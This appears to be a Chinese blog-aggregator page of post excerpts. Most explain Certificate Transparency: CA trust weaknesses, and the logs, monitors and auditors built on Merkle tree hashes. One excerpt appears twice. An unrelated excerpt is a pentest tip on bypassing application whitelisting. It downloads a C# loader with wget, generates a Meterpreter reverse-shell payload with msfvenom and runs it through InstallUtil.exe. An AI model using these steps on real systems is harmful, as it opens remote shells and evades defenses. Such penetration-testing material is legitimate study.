sct

总结证书CT:证书透明度

浪子不回头ぞ 提交于 2020-03-09 19:03:46
证书部分,从服务器生成CSR证书请求文件开始,利用CSR生成自签名证书,然后开始校验,顺着证书链校验服务器身份,签名值,根证书等信息。签名值和根证书校验成功,只能表明该服务器证书是由某一个CA机构所签发的,之后还要校验证书是否已被吊销,可以从CRL校验或者OCSP校验两方面实现。除了OCSP校验是要向OCSP服务提供方进行请求校验外,其他如根证书校验或CRL校验,都是通过CA机构进行,作为校验的基础,或者说是信任的基础,浏览器会信任CA机构和OCSP服务提供商(否则校验也没办法进行),但是这会出现一个什么问题呢,如果CA机构在为服务器签发证书时错误验证服务器实体的身份,签发了一张不安全的证书,或者有人冒充某一个服务器实体去申请签发证书,如果CA机构没有正确验证身份后签发了一张证书,可能会让客户端错误地信任了某一服务器。 对于客户端来说,数字签名技术完成证书校验后,只能证明这个服务器证书确实是由某CA机构签发的,但不能保证它是一张正确的证书,如果这张证书是由别人冒充服务器身份申请的,那么接下来客户端和服务器进行通信,就等于是和冒充者进行通信,还记得中间方攻击吗?以上问题出现的原因,有CA机构自己的问题(签发过程出现身份校验问题),还有一个很重要的就是客户端(浏览器)对CA机构的信任。 证书透明度三个组件 针对上面的问题,证书透明度机制可以很好地解决,Certificate

证书透明化的工作原理

空扰寡人 提交于 2019-12-03 10:10:35
目录 日志基本功能 日志基本操作 监视器和审计的基本操作 典型系统配置 其他系统配置 译: How Certificate Transparency Works 证书透明为当前的SSL证书系统增加了三个新的功能组件: 证书日志 证书监控 证书审计 这些功能组件代表了能提供补充的监控和审核服务的离散软件模块。他们不替代当前的SSL证书系统,也不作为一个选择。实际上,这些组件没有改变基础的信任链模型--让客户端验证域并与服务器建立安全的连接。相反,这些组件通过支持整个SSL证书系统的公开监督和审查扩充了信任链模型 日志基本功能 证书透明系统的中心在于证书日志。一天证书日志是一个简单的网络服务,保存了一条SSL证书记录。证书日志有三条重要的特性: 只能追加--证书只能被添加到日志中;证书不能被删除,修改或追溯地插入到日志中。 加密确认--日志使用特殊的Merkle Tree Hashes加密机制来防止篡改和违规行为。 公开审核--任何人都能查询一条日志并且验证日志的行为,或验证SSL证书已被正确地添加到日志中。 日志数量不必太大:需要足够的日志来保证日志失败或临时中断,但是还不能多到让监控变的困难--例如,超过10条但远小于1000条。每条日志的操作要独立于其他日志(也就是,日志间没有自动复制)。 日志的只能追加的性质允许使用特殊类型的加密哈希来验证日志没有损坏

证书透明化的工作原理

风格不统一 提交于 2019-12-03 10:07:21
目录 日志基本功能 日志基本操作 监视器和审计的基本操作 典型系统配置 其他系统配置 译: How Certificate Transparency Works 证书透明为当前的SSL证书系统增加了三个新的功能组件: 证书日志 证书监控 证书审计 这些功能组件代表了能提供补充的监控和审核服务的离散软件模块。他们不替代当前的SSL证书系统,也不作为一个选择。实际上,这些组件没有改变基础的信任链模型--让客户端验证域并与服务器建立安全的连接。相反,这些组件通过支持整个SSL证书系统的公开监督和审查扩充了信任链模型 日志基本功能 证书透明系统的中心在于证书日志。一天证书日志是一个简单的网络服务,保存了一条SSL证书记录。证书日志有三条重要的特性: 只能追加--证书只能被添加到日志中;证书不能被删除,修改或追溯地插入到日志中。 加密确认--日志使用特殊的Merkle Tree Hashes加密机制来防止篡改和违规行为。 公开审核--任何人都能查询一条日志并且验证日志的行为,或验证SSL证书已被正确地添加到日志中。 日志数量不必太大:需要足够的日志来保证日志失败或临时中断,但是还不能多到让监控变的困难--例如,超过10条但远小于1000条。每条日志的操作要独立于其他日志(也就是,日志间没有自动复制)。 日志的只能追加的性质允许使用特殊类型的加密哈希来验证日志没有损坏

绕过应用程序白名单技巧

匿名 (未验证) 提交于 2019-12-03 00:22:01
在内网渗透中,经常会在内网主机执行执行的渗透工具的时候出现执行不起来的情况,很多时候是由与安全软件做了白名单限制,只允许指定的白名单中的应用程序启动,这时我们就需要利用白名单中的程序做我们想做的事情,执行我们想要执行的程序,下面就给大家分享几个绕过白名单执行应用程序的姿势。 一、通过 csharp 编译文件绕过防病毒软件 1、下载 CSharp 文件 wget http://tinyurl.com/InstallUtil-ShellCode-cs 2、使用 msfvenom 生成一个 msf 的 csharp 格式的 shellcode: msfvenom-p windows / meterpreter / reverse_tcp lhost = YOUR_IP lport = 443 -fcsharp> shellcode.txt 3、在 InstallUtil-ShellCode.cs 文件中,您将注意到代码中有两个功能 先从 main 函数的执行命令行中写入显示提示信息,当使用 InstallUtil.exe 工具运行程序时,将执行名为 Uninstall 函数(橙色框中的代码)的中代码的功能。 installUtil.exe 通常位于受信任的应用程序列表中,可能会绕过某些应用程序白名单软件。 Uninstall 函数中的代码将调用 Shellcode 函数

证书透明的工作原理

折月煮酒 提交于 2019-12-02 19:02:20
目录 日志基本功能 日志基本操作 监视器和审计的基本操作 典型系统配置 其他系统配置 How Certificate Transparency Works 证书透明为当前的SSL证书系统增加了三个新的功能组件: 证书日志 证书监控 证书审计 这些功能组件代表了能提供补充的监控和审核服务的离散软件模块。他们不替代当前的SSL证书系统,也不作为一个选择。实际上,这些组件没有改变基础的信任链模型--让客户端验证域并与服务器建立安全的连接。相反,这些组件通过支持整个SSL证书系统的公开监督和审查扩充了信任链模型 日志基本功能 证书透明系统的中心在于证书日志。一天证书日志是一个简单的网络服务,保存了一条SSL证书记录。证书日志有三条重要的特性: 只能追加--证书只能被添加到日志中;证书不能被删除,修改或追溯地插入到日志中。 加密确认--日志使用特殊的Merkle Tree Hashes加密机制来防止篡改和违规行为。 公开审核--任何人都能查询一条日志并且验证日志的行为,或验证SSL证书已被正确地添加到日志中。 日志数量不必太大:需要足够的日志来保证日志失败或临时中断,但是还不能多到让监控变的困难--例如,超过10条但远小于1000条。每条日志的操作要独立于其他日志(也就是,日志间没有自动复制)。 日志的只能追加性质允许使用特殊类型的加密哈希来验证日志没有损坏